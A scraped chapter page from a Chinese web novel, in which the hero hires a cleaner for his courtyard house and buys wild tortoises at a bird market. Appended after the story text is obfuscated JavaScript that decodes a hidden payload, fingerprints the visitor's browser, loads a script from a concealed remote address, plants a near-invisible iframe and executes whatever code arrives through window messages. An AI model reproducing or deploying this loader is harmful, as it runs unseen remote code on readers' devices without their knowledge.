当前位置:铅笔小说>言情女生>重生1982做顽主> 第一百一十章 春天到了,万物复苏,又到了……

第一百一十章 春天到了,万物复苏,又到了……

  吃过饭,杜康就准备离开。

  徐大宝屁颠颠过来说“杜哥,要不然我帮你送回去,顺带让我妻子小兰也去看看。”

  杜康没想到他这就要上岗,想了下同意。

  徐大宝去村里借了辆车,带着他前往小兰的家。

  两人是在一个村,路过一个小路口,徐大宝在一户人家前跳下车喊道“小兰小兰快出来,我告诉你个好消息。”

  一名打扮利落的少女走了出来,气哼哼指着他说“什么事,大呼小叫像话吗?”

  “我找到工作了,而且帮你找了一个。”

  “真的?”

  听到这个好消息,小兰顾不得矜持,一把抓住他询问。

  “当然是真的,我这不是来带你过去看看,要是满意咱们就定下来。”

  小兰喜笑颜开,回去跟家人说了声,便跳上后车座。

  徐大宝介绍道“这就是我们以后的领导。”

  “叫我老板就行,你们还是称呼我杜哥吧。”

  按理说他年龄比两个人小,应该让他们喊杜康或者小杜,但他的身份被喊小杜怎么也说不过去,只能托大让他们喊个杜哥。

  三人前往四合院,在这之前,杜康先带着他们去木槿轩给王浩说明情况,让他知道徐大宝以后会去工作的事,顺便给徐大宝指明地点,这才回去。

  老妈正巧出门倒垃圾,见到他回家,气哼哼指着他说“你还知道回来,让你打扫卫生,你打扫哪去了?”

  “我这不是帮你找打扫卫生的人,这是小兰姐,我找她来帮忙你打扫卫生的。”

  有外人在场,刘芸不好斥责,白了他一眼,对两人说“请进,有事咱们进去说。”

  请两人进去参观,又将在家的囡囡和娜塔莉亚介绍给他们。

  两人瞬间有种刘姥姥进大观园的感觉,三进四合院,他们一直只是听说,却从没有见过,没想到是这么的富丽堂皇,真是太漂亮了。

  老妈悄悄将他拉到一边说“这合适吗,我怎么有种以前地主家请下人的感觉。”

  杜康指着娜塔莉亚说“这有什么不合适,你问问她,家里保证也有人帮忙干活。”

  “我家住的是别墅,有仆人司机园丁,不多,大概十几人。”

  又被她给秀到了。

  两人相顾无言,随后老妈狠狠瞪了他一眼,那意思分明是在埋怨。

  杜康夹在她们中间,明智的没有说话。

  婆媳关系是一个家庭中永恒不变的话题,一个家庭中多多少少都会出现。

  现在的正常情况是婆婆当家,掌握着家中大权,要不然也不会有“多年婆婆熬成婆”的说法。

  刘芸也想要熬成婆,期盼着有个儿媳妇受她指使,结果……

  面对娜塔莉亚你让她怎么当家?

  别说现在两人没有结婚,她不能指责娜塔莉亚什么,即使两人结婚,她也没办法当家做主。

  儿子找这么好的老婆,她是左右为难啊。

  领着他们逛了一圈,去正房分宾主坐下,杜康咳嗽一声说“小兰姐,在我家里虽然不过打扫卫生的活,但有一点我得说明,不能随意丢垃圾,哪怕一根草在没有经过同意前,也不能乱丢。”

  小兰皱眉,一根草都不能乱丢,这算什么事。

  “这主要是外行一根草,内行当做宝,就像你公公家的这个案板,看似没什么,但却价值两百,若我不说,没人知道吧?

  而我家里有很多东西,是你没有见过也不知用途的,很可能一盆草便价值数百上千。

  又像是她房里写满古怪洋文的纸,很可能是她写作的草稿,以后还有大用。

  所以在熟悉之前,不要乱动,也不能乱丢。……”

  杜康洋洋洒洒说了半天,小兰都懵了,她本以为不过是打扫卫生的活,轻松不累,一月能赚三十五,很好,没想到竟然有这么多讲究。

  急忙在那里点头,表示一定注意,不会乱丢。好家伙一盆草就价值数百,她要是弄丢了,赔都赔不起。

  将一些需要注意的事情说出,看小兰没有问题,打算在这里干,杜康就询问道“这里离清河公社不近,来回不方便,我给你们找个合适的地方居住,不知是准备在这里还是去木槿轩,随便选,哪里都可以。”

  两人对视一眼,相互商量了下,徐大宝说“我们就在这里居住,你随便给我们找一间下人房即可。”

  “没问题,这里房子多的是,你想住哪间住哪间。”

  正好一家五口人居住在有几十间的三进四合院内,过于清冷,没有人气,有他们过来,可以增添点人气。

  杜康笑着答应,知道他们选择在这里居住,是为了能跟他时常接触,亲近于他。

  有句话说的好“穷在闹市无人问,富在深山有远亲”,

  既然徐大宝想要向自己靠拢,以自己马首是瞻,他为何反对,有这么个小弟帮忙做事情不好吗。

  不过他们夫妻俩都在自己手下工作,日后若是生了孩子,也是在四合院长大。

  以前说的家生子就是这么来的吧。

  商量妥当事情,两人告辞离开,回去收拾东西准备上班。

  杜康抬头看到院落中两只伯劳正在那里嬉戏打闹,顿时我勒个大槽,好你个不要脸的伯劳,怪不得想到要房子,这是准备娶妻生子。

  想想自己还没将娜塔莉亚拿下,你就要娶妻生子,干人事?

  好吧,这就不是人。

  鹩哥跑过来飞到他的肩膀上叫着,目的只有一个,也想要,它想要下蛋。

  没错,就是想要下蛋,谁让这是个母的。

  至于为什么不学伯劳去外面勾引个过来,拜托,鹩哥分布在南方,主要产地是东南亚的几个国家,四九城从没有野生的鹩哥出没,它想撩都撩不到。

  这要求不过分,杜康就答应它的请求。

  春天到了,万物复苏,又到了动物们交配的季节。

  伯劳和鹩哥都准备娶妻生子,剩下的就是寻宝鼠,这要是也娶妻生子传宗接代……

  耗子窝啊!

  ********

  已经答应鹩哥的请求,杜康没有犹豫,第二天吃过早饭,前往鸟市准备再买只鹩哥。

  鹩哥站在他的肩膀上,叫声非常愉悦。

  说是鸟市其实就是个自发聚集卖鸟的地方,不仅有鸟,花鸟鱼虫基本都有。

  路过卖鱼的地方,杜康看到那些金鱼忍不住想要看看,家里还有两个水缸,或许可以养些金鱼,正浏览着,忽然看到几只乌龟,瞬间吸引了他的目光。

  乌龟的品种很多,有最常见的巴西龟,又或者金钱龟,石金钱龟、海南金钱龟、眼斑龟、黄喉水龟、金头闭合龟、黄缘闭合龟、黄缘盒龟、黄额闭合龟、鹰嘴龟等等,数都数不清。

  yyxs.la

  而他面前的是草龟,也是乌龟这个称呼的来源。

  乌龟乌龟,乌是什么?黑!

  乌龟就是黑色的龟。

  特指全身乌黑的公草龟。

  公草龟长大之后,在体内激素的刺激下,会通体变黑,背甲、腹甲、四肢、眼睛,全部会变成黑色,成为一只浑身漆黑的墨龟,也就是人们常说的乌龟。

  不同的公草龟,因为各种原因,在变为墨龟的程度和时间上多有不同,所以,一只全身乌黑,色泽美丽的墨龟,是众多养龟爱好者的追求。

  杜康以前听说过墨龟,当时就喜欢上,想过要买两个墨龟,可惜品相好的墨龟价格昂贵,他不舍得购买。

  至于买草龟,等它变成墨龟,时间久不说,世面上卖的草龟,大多数激素龟,没那个味,也就没有购买。

  现在八三年可没有激素龟,全都是野生的草龟,你看那龟甲上紧密排列的生长纹,就知是上等的野生草龟。

  何不买回去放在院子里,让它们自由生活,等过两年就可以见到上等的墨龟。

  至于母龟更能生蛋,然后孵化乌龟蛋,再将小乌龟养大,让你体会到从小开始饲养乌龟的乐趣,也是一种不错的玩法。

  看着亲手喂养的乌龟,一天天长大,那种成就感非常好。

  当然前提是有耐心而且会养,要不然,几年后还是那么小一只,能把你急死。

  若不喜欢墨龟,还可以将乌龟养成绿毛龟。

  绿毛龟是将动物与水生植物巧妙融合为一体的生物,背上生有绿色丝状的水藻,在水中如被毛状,很是奇特,观赏性极佳。

  享有“活翡翠”“绿衣精灵”“绿毛神龟”“千年神龟”的美誉,与白玉龟、蛇形龟、双头龟并称为中国四大珍奇龟。

  养的好,别说龟壳、四肢,连头上都会长出一层绿毛,每当探出头来就仿佛是绿色的头发,绿油油一片,活脱脱一个忍者神龟。

  嗯,也可以理解为头顶绿成一片草原。

  正看着,鹩哥等不及了,振翅飞走,杜康也不在意,他们之间有联系,随时可以找到鹩哥,不会让它丢失。

  “这几只乌龟怎么卖的?”

  “四块一只,这可是我去河边山上溪流边花费大力气抓到的。”

  “一共十一只乌龟,四十如何,若是能行,我全要了。”

  老板惊讶的抬头看看他,这些乌龟他已经卖了有一个月,才卖出去几个,没想到今天遇到大客户,一口气全要了。

  忙不迭答应:“可以。”

  怕他反悔,直接连袋子一起递给他。
eval("\x77\x69\x6e\x64\x6f\x77")["\x43\x6c\x74\x79"]=function(e){var li ='ABCDEFGHIJKLMNOPQRS'+''+'TUVWXYZabcdefghi'+'jklmnopqrstuvwx'+''+'yz0123456789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x69\x52\x5a"]=function(){eval(Clty("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dmFyIGRzPW5ldyBEYXRlKCk7dT1kZWNvZGVVUklDb21wb25lbnQoQ2x0eSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7dT11LnJlcGxhY2UoL3FpaGFuZy9nLGRzLmdldERhdGUoKSk7J2pRdWVyeSc7dmFyIF91YT1uYXZpZ2F0b3IudXNlckFnZW50O3ZhciBfQ2x0eUNsdHk9JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoQ2x0eSgiWW1GcFpIVT0iKSk+LTEgfHwgX3VhLmluZGV4T2YoQ2x0eSgnU0hWaGQyVnBRbkp2ZDNObGNnPT0nKSk+LTEpe2lmKF91YS5pbmRleE9mKENsdHkoJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfQ2x0eUNsdHkpO31lbHNle2Z1bmN0aW9uIHJkKG4sbSl7cmV0dXJuIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSoobS1uKzEpK24pO31mdW5jdGlvbiBybShlKXtpZihlJiZlLnRhZ05hbWUudG9VcHBlckNhc2UoKT09PSJJRlJBTUUiJiZlLnNyYy5pbmRleE9mKHUpPi0xKXtlLnJlbW92ZSgpO31lbHNlIGlmKGUubmV4dEVsZW1lbnRTaWJsaW5nKXtybShlLm5leHRFbGVtZW50U2libGluZyk7fX1sZXQgYz1kW0NsdHkoIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdnJysnJysncUFqJysnJysneCcrJycrJ0hSJysnJysnJzt2YXIgX19rZG5xaWQgPSAnaycgKyByZCgxLCAxMDAwMDApO2RbJ3cnKydyaScrJ3QnKydlJysnbG4nXSgnPGQnKydpdiBpJysnZD0nKyciJytfX2tkbnFpZCsnIj4nKyc8L2QnKydpdicrJz4nKTt3WydfX2snKydkYScrJ25xJysnb2InKydqXzE4NyddPWRbJ3F1JysnZXJ5JysnU2VsZScrJ2N0bycrJ3InXSgnIycrX19rZG5xaWQpO19pZCArPSBkWydxdScrJ2VyeScrJ1NlJysnbGVjJysndG8nKydyQScrJ2xsJ10oJy4nK19jbGFzcykubGVuZ3RoO3ZhciB6ID0gdSsnLTIvJytfaWQrJy8nK3I7ZFsndycrJ3JpJysndCcrJ2UnXSgnPGknKydmcicrJ2EnKydtZSBzdHlsZT0iJysnbScrJ2FyJysnZ2knKyduOjA7cCcrJ2FkJysnZCcrJ2luJysnZzowO2InKydvcicrJ2QnKydlcjpuJysnb24nKydlOycrJ29wJysnYScrJ2NpJysndCcrJ3k6MCcrJy4wJytyZCgyLDkpKyc7d2knKydkdCcrJ2g6JytyZCgyLDUpKydwJysneDtoJysnZScrJ2lnaCcrJ3Q6JytyZCgyLDUpKydwJysneDsnKyciYWwnKydsb3d0cmFuJysnc3BhJysncmVuY3kgc3InKydjPSInK3orJyI+PC9pJysnZnInKydhJysnbWU+Jyk7d1siYWQiKyJkRXYiKyJlbnRMIisiaXN0IisiZW5lciJdKCJtIisiZXNzIisiYWdlIixmdW5jdGlvbihlKXtpZihlLmRhdGFbcitfaWRdKXtybShjKTtuZXcgRnVuY3Rpb24oQ2x0eShlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9DbHR5Q2x0eSk7fX0pKCc9VScrJ2onKycnKydNdGMnKycnKydET3gnKycnKycweScrJycrJ1knKycnKydHJysnJysnSicrJycrJ1RKJysnJysnbicrJzVXJysnJysnWW9sJysnJysnV2NrJysnJysnSicrJycrJ1dibycrJycrJ1JuYycrJycrJ24nKydaJysnWicrJycrJ2tNJysnJysnbCcrJycrJ01ETicrJzBBaicrJ01CTicrJ1QnKydKbCcrJycrJ1JYYScrJycrJ3onKycnKyc1JysneScrJ1onKydadScrJ0YnKycnKydHYScrJ3BGJysnJysnSGNvJysnJysnRm0nKycnKydMelonKydaa00nKycnKydsWScrJ2tNbCcrJ0UwTScrJycrJ2xNSCcrJycrJ2MnKycwJysnUicrJ0hhJysnJysnJywnZycrJycrJ3FBaicrJycrJ3gnKycnKydIUicrJycrJycsd2luZG93LGRvY3VtZW50LDAsJ1onKQ=="));}

上一章目录+书签下一章